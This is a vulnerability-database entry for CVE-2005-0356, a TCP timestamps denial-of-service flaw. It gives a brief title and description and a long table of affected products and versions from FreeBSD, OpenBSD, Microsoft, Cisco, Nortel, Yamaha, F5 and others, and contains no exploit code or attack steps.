ID
VAR-E-200505-0236
CVE
cve_id: | CVE-2005-0356 | Trust: 1.9 |
EDB ID
1008
TITLE
TCP TIMESTAMPS - Denial of Service - Multiple dos Exploit
Trust: 0.6
DESCRIPTION
TCP TIMESTAMPS - Denial of Service. CVE-16685CVE-2005-0356 . dos exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | tcp | model: | timestamps | scope: | - | version: | - | Trust: 1.0 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.4 | Trust: 0.6 |
vendor: | cisco | model: | mgx | scope: | eq | version: | 82501.2.10 | Trust: 0.6 |
vendor: | cisco | model: | mgx | scope: | eq | version: | 82301.2.10 | Trust: 0.6 |
vendor: | cisco | model: | css11500 content services switch s | scope: | eq | version: | 7.30 | Trust: 0.6 |
vendor: | cisco | model: | css11500 content services switch s | scope: | eq | version: | 7.20 | Trust: 0.6 |
vendor: | cisco | model: | call manager | scope: | eq | version: | 3.1 | Trust: 0.6 |
vendor: | yamaha | model: | rtx2000 | scope: | - | version: | - | Trust: 0.3 |
vendor: | yamaha | model: | rtx1500 | scope: | - | version: | - | Trust: 0.3 |
vendor: | yamaha | model: | rtx1100 | scope: | - | version: | - | Trust: 0.3 |
vendor: | yamaha | model: | rtx1000 | scope: | - | version: | - | Trust: 0.3 |
vendor: | yamaha | model: | rtv700 | scope: | - | version: | - | Trust: 0.3 |
vendor: | yamaha | model: | rt57i | scope: | - | version: | - | Trust: 0.3 |
vendor: | yamaha | model: | rt300i | scope: | - | version: | - | Trust: 0.3 |
vendor: | yamaha | model: | rt250i | scope: | - | version: | - | Trust: 0.3 |
vendor: | yamaha | model: | rt105 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sco | model: | unixware | scope: | eq | version: | 7.1.4 | Trust: 0.3 |
vendor: | sco | model: | unixware | scope: | eq | version: | 7.1.3 | Trust: 0.3 |
vendor: | sco | model: | open server | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | openbsd | model: | openbsd | scope: | eq | version: | 3.6 | Trust: 0.3 |
vendor: | openbsd | model: | openbsd | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | openbsd | model: | openbsd | scope: | eq | version: | 3.4 | Trust: 0.3 |
vendor: | openbsd | model: | openbsd | scope: | eq | version: | 3.3 | Trust: 0.3 |
vendor: | openbsd | model: | openbsd | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | openbsd | model: | openbsd | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | openbsd | model: | openbsd | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | nortel | model: | networks wlan access point | scope: | eq | version: | 7250.0 | Trust: 0.3 |
vendor: | nortel | model: | networks wlan access point | scope: | eq | version: | 7220.0 | Trust: 0.3 |
vendor: | nortel | model: | networks universal signaling point compact/lite | scope: | - | version: | - | Trust: 0.3 |
vendor: | nortel | model: | networks universal signaling point | scope: | eq | version: | 5200 | Trust: 0.3 |
vendor: | nortel | model: | networks srg | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | nortel | model: | networks optical metro | scope: | eq | version: | 5200 | Trust: 0.3 |
vendor: | nortel | model: | networks optical metro | scope: | eq | version: | 5100 | Trust: 0.3 |
vendor: | nortel | model: | networks optical metro | scope: | eq | version: | 5000 | Trust: 0.3 |
vendor: | nortel | model: | networks ethernet routing switch | scope: | eq | version: | 1648 | Trust: 0.3 |
vendor: | nortel | model: | networks ethernet routing switch | scope: | eq | version: | 1624 | Trust: 0.3 |
vendor: | nortel | model: | networks ethernet routing switch | scope: | eq | version: | 1612 | Trust: 0.3 |
vendor: | nortel | model: | networks contact center | scope: | - | version: | - | Trust: 0.3 |
vendor: | nortel | model: | networks communications server | scope: | eq | version: | 1000 | Trust: 0.3 |
vendor: | nortel | model: | networks callpilot 703t | scope: | - | version: | - | Trust: 0.3 |
vendor: | nortel | model: | networks callpilot 702t | scope: | - | version: | - | Trust: 0.3 |
vendor: | nortel | model: | networks callpilot 201i | scope: | - | version: | - | Trust: 0.3 |
vendor: | nortel | model: | networks callpilot 200i | scope: | - | version: | - | Trust: 0.3 |
vendor: | nortel | model: | networks bcm | scope: | eq | version: | 400 | Trust: 0.3 |
vendor: | nortel | model: | networks bcm | scope: | eq | version: | 200 | Trust: 0.3 |
vendor: | nortel | model: | networks bcm | scope: | eq | version: | 1000 | Trust: 0.3 |
vendor: | microsoft | model: | windows xp tablet pc edition sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp tablet pc edition | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp professional sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp professional | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp media center edition sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp media center edition | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp home sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp home | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp embedded sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp embedded | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp 64-bit edition version sp1 | scope: | eq | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows xp 64-bit edition version | scope: | eq | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows xp 64-bit edition sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp 64-bit edition | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows server web edition | scope: | eq | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server standard edition | scope: | eq | version: | 2003x64 | Trust: 0.3 |
vendor: | microsoft | model: | windows server standard edition | scope: | eq | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server enterprise edition itanium | scope: | eq | version: | 20030 | Trust: 0.3 |
vendor: | microsoft | model: | windows server enterprise edition | scope: | eq | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server datacenter edition itanium | scope: | eq | version: | 20030 | Trust: 0.3 |
vendor: | microsoft | model: | windows server datacenter edition | scope: | eq | version: | 2003 | Trust: 0.3 |
vendor: | microsoft | model: | windows server sp4 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows server sp3 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows server sp2 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows server sp1 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows server | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows professional sp4 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows professional sp3 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows professional sp2 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows professional sp1 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows professional | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows datacenter server sp4 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows datacenter server sp3 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows datacenter server sp2 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows datacenter server sp1 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows datacenter server | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows advanced server sp4 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows advanced server sp3 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows advanced server sp2 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows advanced server sp1 | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | microsoft | model: | windows advanced server | scope: | eq | version: | 2000 | Trust: 0.3 |
vendor: | ietf | model: | rfc tcp extensions for high performance | scope: | eq | version: | 1323: | Trust: 0.3 |
vendor: | hitachi | model: | gs4000 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | gr4000 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | gr3000 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | alaxala ax | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 5.4 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 5.4 | Trust: 0.3 |
vendor: | freebsd | model: | -prerelease | scope: | eq | version: | 5.4 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 5.3 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 5.3 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 5.3 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 5.3 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 5.2.1 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 5.2 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | freebsd | model: | -release/alpha | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p5 | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 5.1 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p14 | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | freebsd | model: | alpha | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 4.11 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.11 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p3 | scope: | eq | version: | 4.11 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.10 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p8 | scope: | eq | version: | 4.10 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 4.10 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.10 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.9 | Trust: 0.3 |
vendor: | freebsd | model: | -prerelease | scope: | eq | version: | 4.9 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.9 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.8 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p7 | scope: | eq | version: | 4.8 | Trust: 0.3 |
vendor: | freebsd | model: | -prerelease | scope: | eq | version: | 4.8 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.8 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 4.7 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.7 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p17 | scope: | eq | version: | 4.7 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 4.7 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.7 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.6.2 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 4.6 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.6 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p20 | scope: | eq | version: | 4.6 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 4.6 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.6 | Trust: 0.3 |
vendor: | freebsd | model: | -stablepre2002-03-07 | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p32 | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 4.4 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p42 | scope: | eq | version: | 4.4 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.4 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | freebsd | model: | -release-p38 | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | freebsd | model: | -stablepre122300 | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | freebsd | model: | -stablepre050201 | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 4.1.1 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 4.1.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.1.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.0.x | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | freebsd | model: | alpha | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | freebsd | model: | -stablepre2001-07-20 | scope: | eq | version: | 3.5.1 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 3.5.1 | Trust: 0.3 |
vendor: | freebsd | model: | -release | scope: | eq | version: | 3.5.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.5.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.5x | Trust: 0.3 |
vendor: | freebsd | model: | -stablepre122300 | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | freebsd | model: | -stablepre050201 | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | freebsd | model: | -stable | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.5 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.4x | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.4 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.3x | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.3 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.2x | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.1x | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | freebsd | model: | -releng | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.8 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.6 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.5 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2x | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.7.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.6.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.6 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.5 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1x | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.0.5 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 1.1.5.1 | Trust: 0.3 |
vendor: | freebsd | model: | 4.10-prerelease | scope: | - | version: | - | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 3.x | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.x | Trust: 0.3 |
vendor: | freebsd | model: | -current | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 9.0.5 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 9.0.4 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 9.0.3 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 9.0.2 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 9.0.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.6.2 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.6 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.5.12 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.5.11 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.5.10 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.5.9 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.5.6 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.5 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.4 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.3 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | cisco | model: | web collaboration option | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 3.3 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 2.46 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 2.4 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | cisco | model: | unity server | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | support tools | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | sn5400 series storage routers | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | sn storage router sn5428-3.3.2-k9 | scope: | eq | version: | 5428 | Trust: 0.3 |
vendor: | cisco | model: | sn storage router sn5428-3.3.1-k9 | scope: | eq | version: | 5428 | Trust: 0.3 |
vendor: | cisco | model: | sn storage router sn5428-3.2.2-k9 | scope: | eq | version: | 5428 | Trust: 0.3 |
vendor: | cisco | model: | sn storage router sn5428-3.2.1-k9 | scope: | eq | version: | 5428 | Trust: 0.3 |
vendor: | cisco | model: | sn storage router sn5428-2.5.1-k9 | scope: | eq | version: | 5428 | Trust: 0.3 |
vendor: | cisco | model: | sn storage router sn5428-2-3.3.2-k9 | scope: | eq | version: | 5428 | Trust: 0.3 |
vendor: | cisco | model: | sn storage router sn5428-2-3.3.1-k9 | scope: | eq | version: | 5428 | Trust: 0.3 |
vendor: | cisco | model: | sn storage router | scope: | eq | version: | 54201.1.3 | Trust: 0.3 |
vendor: | cisco | model: | sn storage router | scope: | eq | version: | 54201.1(7) | Trust: 0.3 |
vendor: | cisco | model: | sn storage router | scope: | eq | version: | 54201.1(5) | Trust: 0.3 |
vendor: | cisco | model: | sn storage router | scope: | eq | version: | 54201.1(4) | Trust: 0.3 |
vendor: | cisco | model: | sn storage router | scope: | eq | version: | 54201.1(3) | Trust: 0.3 |
vendor: | cisco | model: | sn storage router | scope: | eq | version: | 54201.1(2) | Trust: 0.3 |
vendor: | cisco | model: | secure acs solution engine | scope: | eq | version: | 3.3.2 | Trust: 0.3 |
vendor: | cisco | model: | secure acs solution engine | scope: | eq | version: | 3.3.1 | Trust: 0.3 |
vendor: | cisco | model: | secure acs solution engine | scope: | eq | version: | 3.3 | Trust: 0.3 |
vendor: | cisco | model: | secure acs solution engine | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows server | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 3.1.1 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 3.0.3 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.42 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.6.4 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.6.3 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.6.2 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.5 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.4 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for windows nt | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for unix | scope: | eq | version: | 2.3.6.1 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for unix | scope: | eq | version: | 2.3.5.1 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for unix | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | cisco | model: | secure acs for unix | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.3.2 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.3.1 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.3(1) | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.3 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.2.2 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.2.1 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.2(3) | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.2(2) | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.2(1.20) | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.2(1) | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.1 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | cisco | model: | secure access control server | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | remote monitoring suite option | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | personal assistant | scope: | eq | version: | 1.4(2) | Trust: 0.3 |
vendor: | cisco | model: | personal assistant | scope: | eq | version: | 1.4(1) | Trust: 0.3 |
vendor: | cisco | model: | personal assistant | scope: | eq | version: | 1.3(4) | Trust: 0.3 |
vendor: | cisco | model: | personal assistant | scope: | eq | version: | 1.3(3) | Trust: 0.3 |
vendor: | cisco | model: | personal assistant | scope: | eq | version: | 1.3(2) | Trust: 0.3 |
vendor: | cisco | model: | personal assistant | scope: | eq | version: | 1.3(1) | Trust: 0.3 |
vendor: | cisco | model: | personal assistant | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | mgx | scope: | eq | version: | 82501.2.11 | Trust: 0.3 |
vendor: | cisco | model: | mgx | scope: | eq | version: | 82301.2.11 | Trust: 0.3 |
vendor: | cisco | model: | mgx | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | meetingplace | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ip contact center express | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ip contact center enterprise | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | interactive voice response | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | intelligent contact manager | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | cisco | model: | intelligent contact manager | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | emergency responder | scope: | eq | version: | 1.1 | Trust: 0.3 |
vendor: | cisco | model: | emergency responder | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | e-mail manager | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | css11800 content services switch | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | css11506 content services switch | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | css11503 content services switch | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | css11501 content services switch | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | css11500 content services switch s | scope: | eq | version: | 7.10 | Trust: 0.3 |
vendor: | cisco | model: | css11500 content services switch | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | css11150 content services switch | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | css11050 content services switch | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | css11000 content services switch | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | conference connection | scope: | eq | version: | 1.2 | Trust: 0.3 |
vendor: | cisco | model: | conference connection | scope: | eq | version: | 1.1(1) | Trust: 0.3 |
vendor: | cisco | model: | conference connection | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks windows/wug | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks windows | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks windows | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks vpn/security management solution | scope: | - | version: | - | Trust: 0.3 |
vendor: | cisco | model: | ciscoworks lms | scope: | eq | version: | 1.3 | Trust: 0.3 |
